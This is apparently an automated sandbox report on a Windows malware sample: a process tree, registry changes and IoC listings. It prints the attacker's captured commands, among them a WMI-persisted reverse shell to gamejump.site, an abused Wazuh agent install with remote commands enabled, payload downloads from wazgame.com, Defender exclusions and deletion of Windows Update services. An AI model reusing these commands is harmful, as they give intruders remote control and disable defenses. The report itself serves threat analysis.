\REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\75CA594FEDB7B4C4298DBD4EA0A95A0A\2CCD14952D327D94E99EA35590E81BD9 msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\SourceList\Net msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\UpgradeCodes\75CA594FEDB7B4C4298DBD4EA0A95A0A msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\Language = "1033" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\ProductIcon = "C:\\Windows\\Installer\\{5941DCC2-23D2-49D7-9EE9-3A55098EB19D}\\icon.ico" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\SourceList\Media\1 = ";" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CCD14952D327D94E99EA35590E81BD9\MainFeature msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\Version = "67305482" msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\Assignment = "1" msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\SourceList\PackageName = "wazuh-agent-4.3.10.msi" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Features\2CCD14952D327D94E99EA35590E81BD9 msiexec.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\PackageCode = "1BC85AD0CA17FB348969BACCCFD73B94" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\SourceList msiexec.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\DeploymentFlags = "3" msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9\SourceList\Media msiexec.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ Explorer.EXE Key created \REGISTRY\MACHINE\SOFTWARE\Classes\Installer\Products\2CCD14952D327D94E99EA35590E81BD9 msiexec.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4848 baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3.exe 4848 baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3.exe 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 3128 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
pid Process 652 Process not Found -
Suspicious behavior: MapViewOfSection 20 IoCs
pid Process 4848 baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3.exe 2560 C2E8.exe 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeDebugPrivilege 1436 powershell.exe Token: SeShutdownPrivilege 3128 Explorer.EXE Token: SeCreatePagefilePrivilege 3128 Explorer.EXE Token: SeDebugPrivilege 1220 powershell.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeShutdownPrivilege 4924 powercfg.exe Token: SeCreatePagefilePrivilege 4924 powercfg.exe Token: SeShutdownPrivilege 2460 powercfg.exe Token: SeCreatePagefilePrivilege 2460 powercfg.exe Token: SeShutdownPrivilege 208 powercfg.exe Token: SeCreatePagefilePrivilege 208 powercfg.exe Token: SeShutdownPrivilege 2392 powercfg.exe Token: SeCreatePagefilePrivilege 2392 powercfg.exe Token: SeIncreaseQuotaPrivilege 3932 powershell.exe Token: SeSecurityPrivilege 3932 powershell.exe Token: SeTakeOwnershipPrivilege 3932 powershell.exe Token: SeLoadDriverPrivilege 3932 powershell.exe Token: SeSystemProfilePrivilege 3932 powershell.exe Token: SeSystemtimePrivilege 3932 powershell.exe Token: SeProfSingleProcessPrivilege 3932 powershell.exe Token: SeIncBasePriorityPrivilege 3932 powershell.exe Token: SeCreatePagefilePrivilege 3932 powershell.exe Token: SeBackupPrivilege 3932 powershell.exe Token: SeRestorePrivilege 3932 powershell.exe Token: SeShutdownPrivilege 3932 powershell.exe Token: SeDebugPrivilege 3932 powershell.exe Token: SeSystemEnvironmentPrivilege 3932 powershell.exe Token: SeRemoteShutdownPrivilege 3932 powershell.exe Token: SeUndockPrivilege 3932 powershell.exe Token: SeManageVolumePrivilege 3932 powershell.exe Token: 33 3932 powershell.exe Token: 34 3932 powershell.exe Token: 35 3932 powershell.exe Token: 36 3932 powershell.exe Token: SeIncreaseQuotaPrivilege 3932 powershell.exe Token: SeSecurityPrivilege 3932 powershell.exe -
Suspicious use of FindShellTrayWindow 5 IoCs
pid Process 1232 oldplayer.exe 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE 3128 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 3128 Explorer.EXE 3128 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3128 wrote to memory of 1908 3128 Explorer.EXE 86 PID 3128 wrote to memory of 1908 3128 Explorer.EXE 86 PID 3128 wrote to memory of 1908 3128 Explorer.EXE 86 PID 3128 wrote to memory of 2560 3128 Explorer.EXE 88 PID 3128 wrote to memory of 2560 3128 Explorer.EXE 88 PID 3128 wrote to memory of 2560 3128 Explorer.EXE 88 PID 3128 wrote to memory of 3640 3128 Explorer.EXE 91 PID 3128 wrote to memory of 3640 3128 Explorer.EXE 91 PID 3128 wrote to memory of 3640 3128 Explorer.EXE 91 PID 3128 wrote to memory of 3416 3128 Explorer.EXE 92 PID 3128 wrote to memory of 3416 3128 Explorer.EXE 92 PID 3128 wrote to memory of 3416 3128 Explorer.EXE 92 PID 3128 wrote to memory of 1824 3128 Explorer.EXE 93 PID 3128 wrote to memory of 1824 3128 Explorer.EXE 93 PID 3128 wrote to memory of 1824 3128 Explorer.EXE 93 PID 3416 wrote to memory of 532 3416 D3B3.exe 94 PID 3416 wrote to memory of 532 3416 D3B3.exe 94 PID 3416 wrote to memory of 532 3416 D3B3.exe 94 PID 3416 wrote to memory of 532 3416 D3B3.exe 94 PID 3416 wrote to memory of 532 3416 D3B3.exe 94 PID 3416 wrote to memory of 532 3416 D3B3.exe 94 PID 3416 wrote to memory of 532 3416 D3B3.exe 94 PID 3416 wrote to memory of 532 3416 D3B3.exe 94 PID 3416 wrote to memory of 532 3416 D3B3.exe 94 PID 3416 wrote to memory of 532 3416 D3B3.exe 94 PID 3640 wrote to memory of 3576 3640 D1AE.exe 95 PID 3640 wrote to memory of 3576 3640 D1AE.exe 95 PID 3640 wrote to memory of 1232 3640 D1AE.exe 100 PID 3640 wrote to memory of 1232 3640 D1AE.exe 100 PID 3640 wrote to memory of 1232 3640 D1AE.exe 100 PID 3640 wrote to memory of 1052 3640 D1AE.exe 97 PID 3640 wrote to memory of 1052 3640 D1AE.exe 97 PID 1232 wrote to memory of 4908 1232 oldplayer.exe 101 PID 1232 wrote to memory of 4908 1232 oldplayer.exe 101 PID 1232 wrote to memory of 4908 1232 oldplayer.exe 101 PID 3128 wrote to memory of 4400 3128 Explorer.EXE 102 PID 3128 wrote to memory of 4400 3128 Explorer.EXE 102 PID 3128 wrote to memory of 4400 3128 Explorer.EXE 102 PID 4908 wrote to memory of 3164 4908 oneetx.exe 103 PID 4908 wrote to memory of 3164 4908 oneetx.exe 103 PID 4908 wrote to memory of 3164 4908 oneetx.exe 103 PID 532 wrote to memory of 2680 532 D3B3.exe 105 PID 532 wrote to memory of 2680 532 D3B3.exe 105 PID 532 wrote to memory of 2680 532 D3B3.exe 105 PID 4908 wrote to memory of 3600 4908 oneetx.exe 108 PID 4908 wrote to memory of 3600 4908 oneetx.exe 108 PID 4908 wrote to memory of 3600 4908 oneetx.exe 108 PID 532 wrote to memory of 792 532 D3B3.exe 110 PID 532 wrote to memory of 792 532 D3B3.exe 110 PID 532 wrote to memory of 792 532 D3B3.exe 110 PID 3600 wrote to memory of 3624 3600 cmd.exe 112 PID 3600 wrote to memory of 3624 3600 cmd.exe 112 PID 3600 wrote to memory of 3624 3600 cmd.exe 112 PID 3600 wrote to memory of 2416 3600 cmd.exe 114 PID 3600 wrote to memory of 2416 3600 cmd.exe 114 PID 3600 wrote to memory of 2416 3600 cmd.exe 114 PID 3600 wrote to memory of 3532 3600 cmd.exe 113 PID 3600 wrote to memory of 3532 3600 cmd.exe 113 PID 3600 wrote to memory of 3532 3600 cmd.exe 113 PID 3532 wrote to memory of 3280 3532 cscript.exe 115 PID 3532 wrote to memory of 3280 3532 cscript.exe 115 PID 3532 wrote to memory of 3280 3532 cscript.exe 115 PID 792 wrote to memory of 5004 792 D3B3.exe 117 PID 792 wrote to memory of 5004 792 D3B3.exe 117 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious behavior: MapViewOfSection
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3128 -
C:\Users\Admin\AppData\Local\Temp\baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3.exe"C:\Users\Admin\AppData\Local\Temp\baaf51dad1b196c5e4852c748a6eebf39737ea8af93f452c22168f46b76d7db3.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:4848
-
-
C:\Users\Admin\AppData\Local\Temp\C18F.exeC:\Users\Admin\AppData\Local\Temp\C18F.exe2⤵
- Executes dropped EXE
PID:1908 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1908 -s 8363⤵
- Program crash
PID:3148
-
-
-
C:\Users\Admin\AppData\Local\Temp\C2E8.exeC:\Users\Admin\AppData\Local\Temp\C2E8.exe2⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:2560
-
-
C:\Users\Admin\AppData\Local\Temp\D1AE.exeC:\Users\Admin\AppData\Local\Temp\D1AE.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3640 -
C:\Users\Admin\AppData\Local\Temp\ss31.exe"C:\Users\Admin\AppData\Local\Temp\ss31.exe"3⤵
- Executes dropped EXE
PID:3576
-
-
C:\Users\Admin\AppData\Local\Temp\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\XandETC.exe"3⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
PID:1052
-
-
C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"C:\Users\Admin\AppData\Local\Temp\oldplayer.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4908 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN oneetx.exe /TR "C:\Users\Admin\AppData\Local\Temp\10180c8ca3\oneetx.exe" /F5⤵
- Creates scheduled task(s)
PID:3164
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1000048021\ECI.cmd" "5⤵
- Suspicious use of WriteProcessMemory
PID:3600 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "6⤵PID:3624
-
-
C:\Windows\SysWOW64\cscript.execscript.exe //nologo //e:jscript "C:\Users\Admin\AppData\Local\Temp\1000048021\ECI.cmd"6⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3532 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\1000048021\ECI.cmd" Admin7⤵PID:3280
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" ver "8⤵PID:1176
-
-
C:\Windows\SysWOW64\find.exefind /v "5."8⤵PID:4424
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe Invoke-WebRequest -Uri https://packages.wazuh.com/4.x/windows/wazuh-agent-4.3.10-1.msi -OutFile ${env:tmp}\wazuh-agent-4.3.10.msi; msiexec.exe /i ${env:tmp}\wazuh-agent-4.3.10.msi /q WAZUH_MANAGER='gamejump.site' WAZUH_REGISTRATION_SERVER='gamejump.site' WAZUH_AGENT_GROUP='Drag'; Start-Sleep -S 20 ; Add-Content -Path 'C:\Program Files (x86)\ossec-agent\local_internal_options.conf' -Value 'wazuh_command.remote_commands=1'; NET START WazuhSvc8⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:1436 -
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\wazuh-agent-4.3.10.msi /q WAZUH_MANAGER=gamejump.site WAZUH_REGISTRATION_SERVER=gamejump.site WAZUH_AGENT_GROUP=Drag9⤵
- Enumerates connected drives
PID:5064
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" START WazuhSvc9⤵PID:1660
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 START WazuhSvc10⤵PID:3208
-
-
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="pers", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 300 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"8⤵PID:3612
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="pers", CommandLineTemplate="C:\ProgramData\Package..\WmiPrv.exe C:\ProgramData\Package..\utshellext.dll", CommandLineTemplate="C:\ProgramData\Package..\WmiPrv.exe C:\ProgramData\Package..\utshellext.dll"8⤵PID:724
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="pers"", Consumer="CommandLineEventConsumer.Name="pers""8⤵PID:3528
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="nut", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 240 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"8⤵PID:4052
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="nut", CommandLineTemplate="C:\ProgramData\NUL..\StartMenuExperienceHost.exe gamejump.site 4439 -e cmd.exe", CommandLineTemplate="C:\ProgramData\NUL..\StartMenuExperienceHost.exe gamejump.site 4439 -e cmd.exe"8⤵PID:4752
-
-
C:\Windows\SysWOW64\Wbem\WMIC.exewmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name="nut"", Consumer="CommandLineEventConsumer.Name="nut""8⤵PID:1920
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe iwr https://wazgame.com/store.vbs -o C:\ProgramData\SoftwareDistribution\store.vbs8⤵
- Blocklisted process makes network request
PID:1804
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe iwr https://wazgame.com/libssl-1_1.dll -o C:\ProgramData\USOShared\libssl-1_1.dll8⤵
- Blocklisted process makes network request
PID:2532
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe iwr https://wazgame.com/libcrypto-1_1.dll -o C:\ProgramData\USOShared\libcrypto-1_1.dll8⤵
- Blocklisted process makes network request
PID:4996
-
-
-
-
C:\Windows\SysWOW64\find.exefind /v "5."6⤵PID:2416
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D3B3.exeC:\Users\Admin\AppData\Local\Temp\D3B3.exe2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:3416 -
C:\Users\Admin\AppData\Local\Temp\D3B3.exeC:\Users\Admin\AppData\Local\Temp\D3B3.exe3⤵
- Checks computer location settings
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:532 -
C:\Windows\SysWOW64\icacls.exeicacls "C:\Users\Admin\AppData\Local\06e553a9-a79f-4d19-9a37-d16572b320e1" /deny *S-1-1-0:(OI)(CI)(DE,DC)4⤵
- Modifies file permissions
PID:2680
-
-
C:\Users\Admin\AppData\Local\Temp\D3B3.exe"C:\Users\Admin\AppData\Local\Temp\D3B3.exe" --Admin IsNotAutoStart IsNotTask4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:792 -
C:\Users\Admin\AppData\Local\Temp\D3B3.exe"C:\Users\Admin\AppData\Local\Temp\D3B3.exe" --Admin IsNotAutoStart IsNotTask5⤵
- Checks computer location settings
- Executes dropped EXE
PID:5004 -
C:\Users\Admin\AppData\Local\3f95c230-9f29-4951-8141-ff890beb4b81\build3.exe"C:\Users\Admin\AppData\Local\3f95c230-9f29-4951-8141-ff890beb4b81\build3.exe"6⤵
- Executes dropped EXE
PID:856 -
C:\Windows\SysWOW64\schtasks.exe/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"7⤵
- Creates scheduled task(s)
PID:4600
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\D4FC.exeC:\Users\Admin\AppData\Local\Temp\D4FC.exe2⤵
- Executes dropped EXE
PID:1824 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1824 -s 3403⤵
- Program crash
PID:3664
-
-
-
C:\Users\Admin\AppData\Local\Temp\E411.exeC:\Users\Admin\AppData\Local\Temp\E411.exe2⤵
- Executes dropped EXE
PID:4400 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4400 -s 8123⤵
- Program crash
PID:1732
-
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4456
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:2928
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4152
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:3828
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:2680
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:5104
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:4928
-
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵PID:1180
-
-
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe2⤵PID:3636
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Suspicious use of AdjustPrivilegeToken
PID:1220
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:3660
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1608
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:1472
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
PID:4940
-
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
PID:3500
-
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
PID:1836
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f3⤵PID:4844
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f3⤵PID:1684
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f3⤵
- Modifies security service
PID:1872
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f3⤵PID:3664
-
-
C:\Windows\System32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵PID:4820
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:4008
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2460
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:208
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
PID:2392
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }2⤵
- Suspicious use of AdjustPrivilegeToken
PID:3932
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }2⤵PID:3456
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC3⤵PID:3716
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵PID:1852
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵PID:2540
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵PID:4412
-
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵PID:3292
-
-
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f2⤵PID:1856
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
PID:1268
-
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
PID:3816
-
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
